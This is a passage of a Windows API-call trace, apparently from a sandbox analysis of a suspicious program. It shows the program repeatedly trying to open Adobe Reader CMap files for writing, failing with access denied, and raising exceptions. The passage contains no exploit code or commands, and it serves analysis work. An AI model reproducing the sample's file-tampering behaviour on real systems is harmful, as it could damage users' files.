(x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-H", lpFilePart=0x2d5f690*="Add-RKSJ-H") returned 0x41 [0092.556] GetLastError () returned 0x5 [0092.556] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.556] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.556] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.556] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.557] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.557] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.557] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\add-rksj-h")) returned 0x20 [0092.557] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-B5pc" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-b5pc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.557] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-B5pc", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-B5pc", lpFilePart=0x2d5f690*="Adobe-CNS1-B5pc") returned 0x46 [0092.557] GetLastError () returned 0x5 [0092.557] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.557] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.557] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.557] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.558] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.558] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.558] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-B5pc" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-b5pc")) returned 0x20 [0092.558] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.559] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-2", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-2", lpFilePart=0x2d5f690*="Adobe-GB1-2") returned 0x42 [0092.559] GetLastError () returned 0x5 [0092.559] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.559] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.559] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.559] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.559] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.559] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.559] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-2")) returned 0x20 [0092.560] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Mac" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-mac"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.560] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Mac", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Mac", lpFilePart=0x2d5f690*="Adobe-GB1-H-Mac") returned 0x46 [0092.560] GetLastError () returned 0x5 [0092.560] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.560] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.560] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.560] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.560] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.560] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.560] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Mac" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-mac")) returned 0x20 [0092.561] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-6" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.561] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-6", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-6", lpFilePart=0x2d5f690*="Adobe-Japan1-6") returned 0x45 [0092.561] GetLastError () returned 0x5 [0092.561] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.561] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.561] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.561] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.561] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.562] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.562] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-6" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-6")) returned 0x20 [0092.562] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-1" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.562] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-1", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-1", lpFilePart=0x2d5f690*="Adobe-Korea1-1") returned 0x45 [0092.562] GetLastError () returned 0x5 [0092.562] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.562] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.562] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.562] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.563] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.563] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.563] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-1" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-1")) returned 0x20 [0092.563] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.563] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-H", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-H", lpFilePart=0x2d5f690*="B5pc-H") returned 0x3d [0092.563] GetLastError () returned 0x5 [0092.564] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.564] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.564] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.564] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.564] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.564] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.564] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-h")) returned 0x20 [0092.565] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.565] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-V", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-V", lpFilePart=0x2d5f690*="ETen-B5-V") returned 0x40 [0092.565] GetLastError () returned 0x5 [0092.565] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.565] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.565] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.565] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.565] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.566] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.566] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-v")) returned 0x20 [0092.566] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ext-rksj-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.566] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-V", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-V", lpFilePart=0x2d5f690*="Ext-RKSJ-V") returned 0x41 [0092.566] GetLastError () returned 0x5 [0092.566] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.566] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.566] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.566] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.567] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.567] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.567] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ext-rksj-v")) returned 0x20 [0092.575] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbkp-euc-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.575] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-H", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-H", lpFilePart=0x2d5f690*="GBKp-EUC-H") returned 0x41 [0092.575] GetLastError () returned 0x5 [0092.575] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.575] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.575] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.576] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.576] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.576] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.576] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbkp-euc-h")) returned 0x20 [0092.576] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.577] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\H", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\H", lpFilePart=0x2d5f690*="H") returned 0x38 [0092.577] GetLastError () returned 0x5 [0092.577] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.577] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.577] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.577] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.577] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.577] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.577] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\h")) returned 0x20 [0092.578] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm314-b5-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.578] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-V", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-V", lpFilePart=0x2d5f690*="HKm314-B5-V") returned 0x42 [0092.578] GetLastError () returned 0x5 [0092.578] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.578] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.578] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.578] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.578] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.579] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.579] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm314-b5-v")) returned 0x20 [0092.579] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ksc-euc-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.579] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-V", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-V", lpFilePart=0x2d5f690*="KSC-EUC-V") returned 0x40 [0092.579] GetLastError () returned 0x5 [0092.579] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.579] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.579] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.579] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.580] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.580] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.580] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSC-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ksc-euc-v")) returned 0x20 [0092.580] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2C" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-ucs2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.580] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2C", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2C", lpFilePart=0x2d5f690*="KSCpc-EUC-UCS2C") returned 0x46 [0092.580] GetLastError () returned 0x5 [0092.580] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.581] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.581] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.581] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0092.581] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.581] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0092.581] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-UCS2C" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-ucs2c")) returned 0x20 [0092.582] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCpc-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-kscpc-euc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.582] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCpc-EUC", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCpc-EUC", lpFilePart=0x2d5f690*="UCS2-KSCpc-EUC") returned 0x45 [0092.582] GetLastError () returned 0x5 [0092.582] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0092.582] LocalFree (hMem=0x69e2b0) returned 0x0 [0092.582] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0092.582] RaiseException 